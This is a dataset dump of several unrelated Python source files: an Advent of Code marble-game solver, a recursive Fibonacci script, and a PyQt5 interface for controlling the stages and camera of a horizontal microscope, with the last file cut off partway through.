sys.exit(exit_code)\n","repo_name":"DataBiosphere/hca-ingest","sub_path":"orchestration/hca_manage/verify_release_manifest.py","file_name":"verify_release_manifest.py","file_ext":"py","file_size_in_byte":12585,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"1260513764","text":"import re\n\n\nclass Marble:\n def __init__(self, number):\n self.left = self\n self.right = self\n self.number = number\n\n def get_left(self, n):\n marble = self\n for i in range(n):\n marble = marble.left\n return marble\n\n def get_right(self, n):\n marble = self\n for i in range(n):\n marble = marble.right\n return marble\n\n def insert_right(self, marble, n):\n \"\"\"\n Inserts a marble between the marble n and the marble n+1 to the right\n :param marble:\n :param n:\n :return:\n \"\"\"\n marble.left = self.get_right(n)\n marble.right = self.get_right(n+1)\n self.get_right(n+1).left = marble\n self.get_right(n).right = marble\n\n def remove_left(self, n):\n marble = self.get_left(n)\n l = self.get_left(n+1)\n r = self.get_left(n-1)\n l.right = r\n r.left = l\n return marble\n\n def __repr__(self):\n return \"Marble {}. Left: {}. Right: {}\".format(self.number, self.left.number, self.right.number)\n\n\nclass Game:\n def __init__(self, num_players, last_marble):\n self.last_marble = last_marble\n self.players_points = [0]*num_players\n self.current_marble: \"Marble\" = Marble(0)\n self.__current_player = -1\n self.__current_number = 0\n\n def next_marble(self):\n self.__current_number += 1\n return self.__current_number\n\n def next_player(self):\n self.__current_player += 1\n self.__current_player = self.__current_player % len(self.players_points)\n return self.__current_player\n\n def _play_round(self):\n player = self.next_player()\n marble = Marble(self.next_marble())\n if marble.number % 23 != 0:\n self.current_marble.insert_right(marble,1)\n self.current_marble = marble\n # print(\"[{}]. 
{}\".format(player+1, self.current_marble))\n else:\n self.players_points[player] += marble.number\n self.players_points[player] += self.current_marble.remove_left(7).number\n self.current_marble: \"Marble\" = self.current_marble.get_left(6)\n\n def play(self):\n for i in range(self.last_marble):\n self._play_round()\n bestscore = max(self.players_points)\n print(\"Winner: {} with a score of {}\".format(self.players_points.index(bestscore) + 1, bestscore))\n return bestscore\n\n\ndef part1():\n game = Game(9, 25)\n assert game.play() == 32\n game = Game(10, 1618)\n assert game.play() == 8317\n game = Game(13, 7999)\n assert game.play() == 146373\n with open(\"../input/2018/day9.txt\", \"r\") as file:\n games = file.readlines()\n for line in games:\n values = re.findall(r\"(\\d+)\\splayers.*worth\\s(\\d+).*\", line)[0]\n game = Game(int(values[0]), int(values[1]))\n game.play()\n\n\ndef part2():\n game = Game(403, 7192000)\n game.play()\n\n\npart1()\npart2()\n","repo_name":"seeba8/advent_of_code_2018","sub_path":"src/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10430290595","text":"def fibonacci(n):\n assert n>=0 and int(n) == n,'fibonacci number cannot be negative number or non-integer number'\n if n in [0,1]:\n return n\n else:\n return fibonacci(n-1)+fibonacci(n-2)\n\nn= int(input('enter n - '))\nprint(f\"the {n}th fibonacci number is \"+str(fibonacci(n)))\nfor i in range(n+1):\n print(fibonacci(i))","repo_name":"Nryreddy/Recursion","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9582843835","text":"\"\"\"Main GUI display.\n\nThis module contains the `GUI` and `MyTableWidget` class' responsible for\ncreating the main user interface with the FAR-IR Horizontal Microscope.\n\"\"\"\n\n\nfrom flir_camera_control import get_image\nfrom PyQt5.QtGui import QPixmap, QFont, QIcon\nfrom PyQt5.QtCore import QRectF, QTimer, Qt\nfrom PyQt5.QtWidgets import (\n QButtonGroup, QComboBox, QDockWidget, QGridLayout, QLabel, QLineEdit,\n QMainWindow, QPushButton, QRadioButton, QScrollBar, QTabWidget,\n QTextBrowser, QVBoxLayout, QWidget, QFileDialog\n)\nfrom typing import Any\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyqtgraph as pg\nimport pyqtgraph.ptime as ptime\n\n\nclass GUI(QMainWindow):\n \"\"\"Main GUI window.\n\n The `GUI` class creates the main gui window which allows users to monitor\n and control the main functionality of the microscope.\n\n Parameters\n ----------\n data : dict\n Dictionary of raw configuration variable data.\n macros : dict\n Dictionary of macro variables (planar version of the `data` attribute).\n savedPos : dict\n Dictionary of saved positions.\n\n Attributes\n ----------\n data : dict\n Dictionary containing initialization data.\n macros : dict\n Dictionary containing macro variables.\n tab : MyTableWidget object\n The tabular display located on the main GUI window.\n xSN, ySN, zSN : QPushButton\n Negative incrment button for the sample's x, y, and z dimensions.\n xSP, ySP, zSP : QPushButton\n Positive incrment button for the sample's x, y, and z dimensions.\n xSStep, ySStep, zSStep : QLineEdit\n Step size line edit for the sample's x, y, and z dimensions.\n xSAbsPos, ySAbsPos, zSAbsPos : QLineEdit\n Absolute position line edit for the sample's x, y, and z 
dimensions.\n xSMove, ySMove, zSMove : QPushButton\n Move to absolute position button for the sample's x, y, and z\n dimensions.\n xSCn, ySCn, zSCn : QPushButton\n Continuous negative motion button for the sample's x, y, and z\n dimensions.\n xSStop, ySStop, zSStop : QPushButton\n Stop continuous motion button for the sample's x, y, and z dimensions.\n xSCp, ySCp, zSCp : QPushButton\n Continuous positive motion button for the sample's x, y, and z\n dimensions.\n xSSn, ySSn, zSSn : QLabel\n Negative soft limit label for the sample's x, y, and z dimensions.\n xSSp, ySSp, zSSp : QLabel\n Positive soft limit label for the sample's x, y, and z dimensions.\n xSHn, ySHn, zSHn : QLabel\n Negative hard limit label for the sample's x, y, and z dimensions.\n xSHp, ySHp, zSHp : QLabel\n Positive hard limit label for the sample's x, y, and z dimensions.\n xStepS, yStepS, zStepS : QLabel\n STEPS label for the sample's x, y, and z dimensions.\n xIdleS, yIdleS, zIdleS : QLabel\n Motor status label for the sample's x, y, and z dimensions.\n xON, yON, zON : QPushButton\n Negative increment button for the objective's x, y, and z dimensions.\n xOP, yOP, zOP : QPushButton\n Positive increment button for the objective's x, y, and z dimensions.\n xOStep, yOStep, zOStep : QLineEdit\n Step size line edit for the objective's x, y, and z dimensions.\n xOAbsPos, yOAbsPos, zOAbsPos : QLineEdit\n Absolute position line edit for the objective's x, y, and z dimensions.\n xOMove, yOMove, zOMove : QPushButton\n Move to absolute position button for the objective's x, y, and z\n dimensions.\n xOCn, yOCn, zOCn : QPushButton\n Continuous negative motion button for the objective's x, y, and z\n dimensions.\n xOStop, yOStop, zOStop : QPushButton\n Stop continuous motion button for the objective's x, y, and z\n dimensions.\n xOCp, yOCp, zOCp : QPushButton\n Continuous positive motion button for the objective's x, y, and z\n dimensions.\n xOSn, yOSn, zOSn : QLabel\n Negative soft limit label for the objective's x, y, and z dimensions.\n xOSp, yOSp, zOSp : QLabel\n Positive soft limit label for the objective's x, y, and z dimensions.\n xOHn, yOHn, zOHn : QLabel\n Negative hard limit label for the objective's x, y, and z dimensions.\n xOHp, yOHp, zOHp : QLabel\n Positive hard limit label for the objective's x, y, and z dimensions.\n xStepO, yStepO, zStepO : QLabel\n STEPS label for the objective's x, y, and z dimensions.\n xIdleO, yIdleO, zIdleO : QLabel\n Motor status label for the objective's x, y, and z dimensions.\n textWindow : QTextBrowser\n Text browser to display Terminal output.\n savePos : QPushButton\n Save current position push button.\n loadPos : QPushButton\n Load selected position push button.\n deletePos : QPushButton\n Delete selected position push button.\n clearPos : QPushButton\n Clear all saved positions push button.\n posSelect : QComboBox\n Combo box to select a saved position.\n posLabel : QLineEdit\n Text box to insert the label for a position to save.\n loadConfig : QPushButton\n Load a new configuration button.\n saveConfig : QPushButton\n Save current configuration button.\n positionUnits : QPushButton\n Control to change the current position between steps and microns.\n\n Methods\n -------\n diagram_window()\n Return the diagram window.\n tabular_window()\n Return the table window.\n sample_window()\n Return the sample window.\n objective_window()\n Return the objective window.\n base_window()\n Return the base window.\n \"\"\"\n\n def __init__(self, data: dict, macros: dict, savedPos: 
dict) -> None:\n \"\"\"Initialize the GUI.\n \n Notes\n -----\n This method initializes the user interface by instantiating important\n attributes, configuring the main window, and calling helper functions\n to create individual windows.\n \"\"\"\n\n super().__init__()\n\n self.data = data\n self.macros = macros\n self.savedPos = savedPos\n\n # Set MicroGUI logo.\n self.setWindowIcon(QIcon(\"figures/MicroGUI_logo.png\"))\n\n # Define main GUI window.\n self.setWindowTitle(\"Horizontal Microscope Control\")\n self.setFixedWidth(1500)\n self.setFixedHeight(750)\n\n # Add sub-windows to main window layout.\n self.layout = QGridLayout()\n self.layout.addWidget(self.diagram_window(), 0, 0, 2, 5)\n self.layout.addWidget(CameraWindow(), 0, 5, 2, 5)\n self.layout.addWidget(self.tabular_window(), 0, 10, 2, 5)\n self.layout.addWidget(self.sample_window(), 2, 0, 1, 15)\n self.layout.addWidget(self.objective_window(), 3, 0, 1, 15)\n self.layout.addWidget(self.base_window(), 4, 0, 3, 15)\n\n # Set main window layout.\n self.centralWidget = QWidget(self)\n self.setCentralWidget(self.centralWidget)\n self.centralWidget.setLayout(self.layout)\n\n self.show()\n\n def diagram_window(self) -> QLabel:\n \"\"\"Return the diagram window.\n\n This method returns a label with the diagram display to allow users to\n understand motor motion and button correspondance.\n\n Returns\n -------\n QLabel\n Window representing the diagram display.\n \"\"\"\n\n window = QLabel()\n image = QPixmap(\"figures/diagram.jpg\")\n image = image.scaled(350, 350, Qt.KeepAspectRatio)\n window.setPixmap(QPixmap(image))\n\n return window\n\n def tabular_window(self) -> QWidget:\n \"\"\"Return the table window.\n\n This method returns the tab window for the gui configuration controls.\n\n Returns\n -------\n MyTableWidget(QWidget)\n Object representing the tabular widget.\n \"\"\"\n\n self.tab = MyTableWidget(self)\n return self.tab\n\n def sample_window(self) -> QWidget:\n \"\"\"Return the sample window.\n\n This method returns the controls and motor status indicators for the\n sample stage.\n\n Returns\n -------\n QWidget\n Window representing the sample interactive widgets.\n \"\"\"\n\n window = QWidget()\n layout = QGridLayout()\n\n sampleLab = QLabel(\"Sample Stage\")\n sampleLab.setFont(QFont(\"Times\", 9))\n layout.addWidget(sampleLab, 0, 0, 1, 12)\n\n # Define widget style sheets.\n button_style_grey = \"background-color: lightgrey\"\n button_style_red = \"background-color: red\"\n label_style_grey = \"background-color: lightgrey; border: 1px solid black;\"\n\n # Set column labels.\n layout.addWidget(QLabel(\"Axis\"), 1, 0, 1, 1)\n layout.addWidget(QLabel(\"Increment Position\"), 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Step Size\"), 1, 3, 1, 1)\n layout.addWidget(QLabel(\"Absolute Position\"), 1, 4, 1, 1)\n layout.addWidget(QLabel(\"Continual Motion\"), 1, 6, 1, 3)\n layout.addWidget(QLabel(\"Soft Limits\"), 1, 9, 1, 2)\n layout.addWidget(QLabel(\"Hard Limits\"), 1, 11, 1, 2)\n layout.addWidget(QLabel(\"Current Position\"), 1, 13, 1, 1)\n layout.addWidget(QLabel(\"Motor Status\"), 1, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # X Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.xSN = QPushButton(\"In\")\n self.xSP = QPushButton(\"Out\")\n self.xSStep = QLineEdit(\"0\")\n self.xSAbsPos = QLineEdit(\"0\")\n self.xSMove = QPushButton(\"MOVE\")\n self.xSCn = QPushButton(\"In\")\n self.xSStop = 
QPushButton(\"STOP\")\n self.xSCp = QPushButton(\"Out\")\n self.xSSn = QLabel(\"In\")\n self.xSSp = QLabel(\"Out\")\n self.xSHn = QLabel(\"In\")\n self.xSHp = QLabel(\"Out\")\n self.xIdleS = QLabel(\"IDLE\")\n self.xStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.xIdleS.setAlignment(Qt.AlignCenter)\n self.xStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.xSN.setStyleSheet(button_style_grey)\n self.xSP.setStyleSheet(button_style_grey)\n self.xSMove.setStyleSheet(button_style_grey)\n self.xSCn.setStyleSheet(button_style_grey)\n self.xSStop.setStyleSheet(button_style_red)\n self.xSCp.setStyleSheet(button_style_grey)\n self.xSSn.setStyleSheet(label_style_grey)\n self.xSSp.setStyleSheet(label_style_grey)\n self.xSHn.setStyleSheet(label_style_grey)\n self.xSHp.setStyleSheet(label_style_grey)\n self.xIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n layout.addWidget(self.xSN, 2, 1, 1, 1)\n layout.addWidget(self.xSP, 2, 2, 1, 1)\n layout.addWidget(self.xSStep, 2, 3, 1, 1)\n layout.addWidget(self.xSAbsPos, 2, 4, 1, 1)\n layout.addWidget(self.xSMove, 2, 5, 1, 1)\n layout.addWidget(self.xSCn, 2, 6, 1, 1)\n layout.addWidget(self.xSStop, 2, 7, 1, 1)\n layout.addWidget(self.xSCp, 2, 8, 1, 1)\n layout.addWidget(self.xSSn, 2, 9, 1, 1)\n layout.addWidget(self.xSSp, 2, 10, 1, 1)\n layout.addWidget(self.xSHn, 2, 11, 1, 1)\n layout.addWidget(self.xSHp, 2, 12, 1, 1)\n layout.addWidget(self.xStepS, 2, 13, 1, 1)\n layout.addWidget(self.xIdleS, 2, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Y Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.ySN = QPushButton(\"Up\")\n self.ySP = QPushButton(\"Down\")\n self.ySStep = QLineEdit(\"0\")\n self.ySAbsPos = QLineEdit(\"0\")\n self.ySMove = QPushButton(\"MOVE\")\n self.ySCn = QPushButton(\"Up\")\n self.ySStop = QPushButton(\"STOP\")\n self.ySCp = QPushButton(\"Down\")\n self.ySSn = QLabel(\"Up\")\n self.ySSp = QLabel(\"Down\")\n self.ySHn = QLabel(\"Up\")\n self.ySHp = QLabel(\"Down\")\n self.yIdleS = QLabel(\"IDLE\")\n self.yStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.yIdleS.setAlignment(Qt.AlignCenter)\n self.yStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.ySN.setStyleSheet(button_style_grey)\n self.ySP.setStyleSheet(button_style_grey)\n self.ySMove.setStyleSheet(button_style_grey)\n self.ySCn.setStyleSheet(button_style_grey)\n self.ySStop.setStyleSheet(button_style_red)\n self.ySCp.setStyleSheet(button_style_grey)\n self.ySSn.setStyleSheet(label_style_grey)\n self.ySSp.setStyleSheet(label_style_grey)\n self.ySHn.setStyleSheet(label_style_grey)\n self.ySHp.setStyleSheet(label_style_grey)\n self.yIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n layout.addWidget(self.ySN, 3, 1, 1, 1)\n layout.addWidget(self.ySP, 3, 2, 1, 1)\n layout.addWidget(self.ySStep, 3, 3, 1, 1)\n layout.addWidget(self.ySAbsPos, 3, 4, 1, 1)\n layout.addWidget(self.ySMove, 3, 5, 1, 1)\n layout.addWidget(self.ySCn, 3, 6, 1, 1)\n layout.addWidget(self.ySStop, 3, 7, 1, 1)\n layout.addWidget(self.ySCp, 3, 8, 1, 1)\n layout.addWidget(self.ySSn, 3, 9, 1, 1)\n layout.addWidget(self.ySSp, 3, 10, 1, 1)\n layout.addWidget(self.ySHn, 3, 11, 1, 1)\n layout.addWidget(self.ySHp, 3, 12, 1, 1)\n layout.addWidget(self.yStepS, 3, 13, 1, 1)\n 
layout.addWidget(self.yIdleS, 3, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Z Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.zSN = QPushButton(\"Upstream\")\n self.zSP = QPushButton(\"Downstream\")\n self.zSStep = QLineEdit(\"0\")\n self.zSAbsPos = QLineEdit(\"0\")\n self.zSMove = QPushButton(\"MOVE\")\n self.zSCn = QPushButton(\"Upstream\")\n self.zSStop = QPushButton(\"STOP\")\n self.zSCp = QPushButton(\"Downstream\")\n self.zSSn = QLabel(\"Upstream \")\n self.zSSp = QLabel(\"Downstream\")\n self.zSHn = QLabel(\"Upstream \")\n self.zSHp = QLabel(\"Downstream\")\n self.zIdleS = QLabel(\"IDLE\")\n self.zStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.zIdleS.setAlignment(Qt.AlignCenter)\n self.zStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.zSN.setStyleSheet(button_style_grey)\n self.zSP.setStyleSheet(button_style_grey)\n self.zSMove.setStyleSheet(button_style_grey)\n self.zSCn.setStyleSheet(button_style_grey)\n self.zSStop.setStyleSheet(button_style_red)\n self.zSCp.setStyleSheet(button_style_grey)\n self.zSSn.setStyleSheet(label_style_grey)\n self.zSSp.setStyleSheet(label_style_grey)\n self.zSHn.setStyleSheet(label_style_grey)\n self.zSHp.setStyleSheet(label_style_grey)\n self.zIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n layout.addWidget(self.zSN, 4, 1, 1, 1)\n layout.addWidget(self.zSP, 4, 2, 1, 1)\n layout.addWidget(self.zSStep, 4, 3, 1, 1)\n layout.addWidget(self.zSAbsPos, 4, 4, 1, 1)\n layout.addWidget(self.zSMove, 4, 5, 1, 1)\n layout.addWidget(self.zSCn, 4, 6, 1, 1)\n layout.addWidget(self.zSStop, 4, 7, 1, 1)\n layout.addWidget(self.zSCp, 4, 8, 1, 1)\n layout.addWidget(self.zSSn, 4, 9, 1, 1)\n layout.addWidget(self.zSSp, 4, 10, 1, 1)\n layout.addWidget(self.zSHn, 4, 11, 1, 1)\n layout.addWidget(self.zSHp, 4, 12, 1, 1)\n layout.addWidget(self.zStepS, 4, 13, 1, 1)\n layout.addWidget(self.zIdleS, 4, 14, 1, 1)\n\n # Set window layout.\n window.setLayout(layout)\n return window\n\n def objective_window(self) -> QWidget:\n \"\"\"Return the objective window.\n\n This method returns the controls and motor status indicators for the\n objective stage.\n\n Returns\n -------\n QWidget\n Window representing the objective interactive widgets.\n \"\"\"\n\n window = QWidget()\n layout = QGridLayout()\n\n objectiveLab = QLabel(\"Objective Stage\")\n objectiveLab.setFont(QFont(\"Times\", 9))\n layout.addWidget(objectiveLab, 0, 0, 1, 13)\n\n # Define widget style sheets.\n button_style_grey = \"background-color: lightgrey\"\n button_style_red = \"background-color: red\"\n label_style_grey = \"background-color: lightgrey; border: 1px solid black;\"\n\n # Set column labels.\n layout.addWidget(QLabel(\"Axis\"), 1, 0, 1, 1)\n layout.addWidget(QLabel(\"Increment Position\"), 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Step Size\"), 1, 3, 1, 1)\n layout.addWidget(QLabel(\"Absolute Position\"), 1, 4, 1, 1)\n layout.addWidget(QLabel(\"Continual Motion\"), 1, 6, 1, 3)\n layout.addWidget(QLabel(\"Soft Limits\"), 1, 9, 1, 2)\n layout.addWidget(QLabel(\"Hard Limits\"), 1, 11, 1, 2)\n layout.addWidget(QLabel(\"Current Position\"), 1, 13, 1, 1)\n layout.addWidget(QLabel(\"Motor Status\"), 1, 14, 1, 1)\n\n # ----------------------------------------------------------------------\n # X Objective Axis\n # ---------------------------------------------------------------------\n\n # 
Create interactive widgets.\n self.xON = QPushButton(\"In\")\n self.xOP = QPushButton(\"Out\")\n self.xOStep = QLineEdit(\"0\")\n self.xOAbsPos = QLineEdit(\"0\")\n self.xOMove = QPushButton(\"MOVE\")\n self.xOCn = QPushButton(\"In\")\n self.xOStop = QPushButton(\"STOP\")\n self.xOCp = QPushButton(\"Out\")\n self.xOSn = QLabel(\"In\")\n self.xOSp = QLabel(\"Out\")\n self.xOHn = QLabel(\"In\")\n self.xOHp = QLabel(\"Out\")\n self.xIdleO = QLabel(\"IDLE\")\n self.xStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.xIdleO.setAlignment(Qt.AlignCenter)\n self.xStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.xON.setStyleSheet(button_style_grey)\n self.xOP.setStyleSheet(button_style_grey)\n self.xOMove.setStyleSheet(button_style_grey)\n self.xOCn.setStyleSheet(button_style_grey)\n self.xOStop.setStyleSheet(button_style_red)\n self.xOCp.setStyleSheet(button_style_grey)\n self.xOSn.setStyleSheet(label_style_grey)\n self.xOSp.setStyleSheet(label_style_grey)\n self.xOHn.setStyleSheet(label_style_grey)\n self.xOHp.setStyleSheet(label_style_grey)\n self.xIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n layout.addWidget(self.xON, 2, 1, 1, 1)\n layout.addWidget(self.xOP, 2, 2, 1, 1)\n layout.addWidget(self.xOStep, 2, 3, 1, 1)\n layout.addWidget(self.xOAbsPos, 2, 4, 1, 1)\n layout.addWidget(self.xOMove, 2, 5, 1, 1)\n layout.addWidget(self.xOCn, 2, 6, 1, 1)\n layout.addWidget(self.xOStop, 2, 7, 1, 1)\n layout.addWidget(self.xOCp, 2, 8, 1, 1)\n layout.addWidget(self.xOSn, 2, 9, 1, 1)\n layout.addWidget(self.xOSp, 2, 10, 1, 1)\n layout.addWidget(self.xOHn, 2, 11, 1, 1)\n layout.addWidget(self.xOHp, 2, 12, 1, 1)\n layout.addWidget(self.xStepO, 2, 13, 1, 1)\n layout.addWidget(self.xIdleO, 2, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Y Objectivs Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.yON = QPushButton(\"Up\")\n self.yOP = QPushButton(\"Down\")\n self.yOStep = QLineEdit(\"0\")\n self.yOAbsPos = QLineEdit(\"0\")\n self.yOMove = QPushButton(\"MOVE\")\n self.yOCn = QPushButton(\"Up\")\n self.yOStop = QPushButton(\"STOP\")\n self.yOCp = QPushButton(\"Down\")\n self.yOSn = QLabel(\"Up\")\n self.yOSp = QLabel(\"Down\")\n self.yOHn = QLabel(\"Up\")\n self.yOHp = QLabel(\"Down\")\n self.yIdleO = QLabel(\"IDLE\")\n self.yStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.yIdleO.setAlignment(Qt.AlignCenter)\n self.yStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.yON.setStyleSheet(button_style_grey)\n self.yOP.setStyleSheet(button_style_grey)\n self.yOMove.setStyleSheet(button_style_grey)\n self.yOCn.setStyleSheet(button_style_grey)\n self.yOStop.setStyleSheet(button_style_red)\n self.yOCp.setStyleSheet(button_style_grey)\n self.yOSn.setStyleSheet(label_style_grey)\n self.yOSp.setStyleSheet(label_style_grey)\n self.yOHn.setStyleSheet(label_style_grey)\n self.yOHp.setStyleSheet(label_style_grey)\n self.yIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n layout.addWidget(self.yON, 3, 1, 1, 1)\n layout.addWidget(self.yOP, 3, 2, 1, 1)\n layout.addWidget(self.yOStep, 3, 3, 1, 1)\n layout.addWidget(self.yOAbsPos, 3, 4, 1, 1)\n layout.addWidget(self.yOMove, 3, 5, 1, 1)\n layout.addWidget(self.yOCn, 3, 6, 1, 1)\n layout.addWidget(self.yOStop, 3, 7, 1, 1)\n 
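        # Widget names follow the pattern <axis><stage><role>: e.g. yOCp is
        # the y axis of the Objective stage, Continuous-positive button, and
        # an S in place of the O denotes the Sample stage (Sn/Sp and Hn/Hp
        # mark the soft- and hard-limit labels).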
layout.addWidget(self.yOCp, 3, 8, 1, 1)\n layout.addWidget(self.yOSn, 3, 9, 1, 1)\n layout.addWidget(self.yOSp, 3, 10, 1, 1)\n layout.addWidget(self.yOHn, 3, 11, 1, 1)\n layout.addWidget(self.yOHp, 3, 12, 1, 1)\n layout.addWidget(self.yStepO, 3, 13, 1, 1)\n layout.addWidget(self.yIdleO, 3, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Z Objective Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.zON = QPushButton(\"Upstream\")\n self.zOP = QPushButton(\"Downstream\")\n self.zOStep = QLineEdit(\"0\")\n self.zOAbsPos = QLineEdit(\"0\")\n self.zOMove = QPushButton(\"MOVE\")\n self.zOCn = QPushButton(\"Upstream\")\n self.zOStop = QPushButton(\"STOP\")\n self.zOCp = QPushButton(\"Downstream\")\n self.zOSn = QLabel(\"Upstream \")\n self.zOSp = QLabel(\"Downstream\")\n self.zOHn = QLabel(\"Upstream \")\n self.zOHp = QLabel(\"Downstream\")\n self.zIdleO = QLabel(\"IDLE\")\n self.zStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.zIdleO.setAlignment(Qt.AlignCenter)\n self.zStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.zON.setStyleSheet(button_style_grey)\n self.zOP.setStyleSheet(button_style_grey)\n self.zOMove.setStyleSheet(button_style_grey)\n self.zOCn.setStyleSheet(button_style_grey)\n self.zOStop.setStyleSheet(button_style_red)\n self.zOCp.setStyleSheet(button_style_grey)\n self.zOSn.setStyleSheet(label_style_grey)\n self.zOSp.setStyleSheet(label_style_grey)\n self.zOHn.setStyleSheet(label_style_grey)\n self.zOHp.setStyleSheet(label_style_grey)\n self.zIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n layout.addWidget(self.zON, 4, 1, 1, 1)\n layout.addWidget(self.zOP, 4, 2, 1, 1)\n layout.addWidget(self.zOStep, 4, 3, 1, 1)\n layout.addWidget(self.zOAbsPos, 4, 4, 1, 1)\n layout.addWidget(self.zOMove, 4, 5, 1, 1)\n layout.addWidget(self.zOCn, 4, 6, 1, 1)\n layout.addWidget(self.zOStop, 4, 7, 1, 1)\n layout.addWidget(self.zOCp, 4, 8, 1, 1)\n layout.addWidget(self.zOSn, 4, 9, 1, 1)\n layout.addWidget(self.zOSp, 4, 10, 1, 1)\n layout.addWidget(self.zOHn, 4, 11, 1, 1)\n layout.addWidget(self.zOHp, 4, 12, 1, 1)\n layout.addWidget(self.zStepO, 4, 13, 1, 1)\n layout.addWidget(self.zIdleO, 4, 14, 1, 1)\n\n # Set window layout.\n window.setLayout(layout)\n return window\n\n def base_window(self) -> QTextBrowser:\n \"\"\"Return the base window.\n\n This method returns the user interface's base window containing the\n program status window, position save controls, configuration file\n controls, and current position unit controls.\n\n Returns\n -------\n QWidget\n Window representing the objective interactive widgets.\n \"\"\"\n\n # Initialize the text browser window.\n self.textWindow = QTextBrowser()\n self.textWindow.setAcceptRichText(True)\n self.textWindow.setOpenExternalLinks(True)\n self.textWindow.setVerticalScrollBar(QScrollBar())\n\n # Save and load position functionality.\n self.savePos = QPushButton(\"Save Position\")\n self.loadPos = QPushButton(\"Load Position\")\n self.deletePos = QPushButton(\"Delete Position\")\n self.clearPos = QPushButton(\"Clear All Positions\")\n self.posSelect = QComboBox()\n self.posLabel = QLineEdit(\"Position Label\")\n\n # Add items to the saved positions drop down menu.\n self.posSelect.addItem(\"--None--\")\n for key in self.savedPos.keys():\n self.posSelect.addItem(key)\n\n # Set button style sheets.\n 
self.savePos.setStyleSheet(\"background-color: lightgrey\")\n self.loadPos.setStyleSheet(\"background-color: lightgrey\")\n self.deletePos.setStyleSheet(\"background-color: lightgrey\")\n self.clearPos.setStyleSheet(\"background-color: lightgrey\")\n\n # Set the save and load layout.\n self.posWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Save and Load Position\"), 0, 0, 1, 5)\n layout.addWidget(self.posSelect, 1, 0, 1, 2)\n layout.addWidget(self.loadPos, 2, 0, 1, 1)\n layout.addWidget(self.deletePos, 2, 1, 1, 1)\n layout.addWidget(self.posLabel, 1, 2, 1, 1)\n layout.addWidget(self.savePos, 1, 3, 1, 1)\n layout.addWidget(self.clearPos, 2, 2, 1, 2)\n self.posWindow.setLayout(layout)\n\n # Progran-configuration functionality.\n self.configWindow = QWidget()\n self.loadConfig = QPushButton(\"Load Config\")\n self.saveConfig = QPushButton(\"Save Config\")\n self.loadConfig.setStyleSheet(\"background-color: lightgrey\")\n self.saveConfig.setStyleSheet(\"background-color: lightgrey\")\n\n # Set the program configuration layout.\n self.configWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Program Configuration\"), 0, 0, 1, 2)\n layout.addWidget(self.loadConfig, 1, 0, 1, 2)\n layout.addWidget(self.saveConfig, 2, 0, 1, 2)\n self.configWindow.setLayout(layout)\n\n # Unit conversion functionality.\n self.positionUnits = QPushButton(\"Microns\")\n self.positionUnits.setStyleSheet(\"background-color: lightgrey\")\n self.positionUnits.setCheckable(True)\n\n # Set units window layout.\n self.unitsWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Current Position Units\"), 0, 0, 1, 1)\n layout.addWidget(self.positionUnits, 1, 0, 2, 1)\n self.unitsWindow.setLayout(layout)\n\n # Create base window.\n self.baseWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(self.textWindow, 0, 0, 3, 5)\n layout.addWidget(self.posWindow, 0, 5, 3, 5)\n layout.addWidget(self.configWindow, 0, 10, 3, 2)\n layout.addWidget(self.unitsWindow, 0, 12, 3, 2)\n self.baseWindow.setLayout(layout)\n\n return self.baseWindow\n\n\nclass CameraWindow(QMainWindow):\n \"\"\"Generate detachable camera window.\n\n Attributes\n ----------\n cameraWindow : QWidget\n QWidget window containing camera feed and interface.\n img : pg.ImageItem\n Live feed image from Blackfly camera.\n image : nd.array\n Current image displayed in an array representation.\n WCB : QPushButton\n Image capture push button.\n SHC : 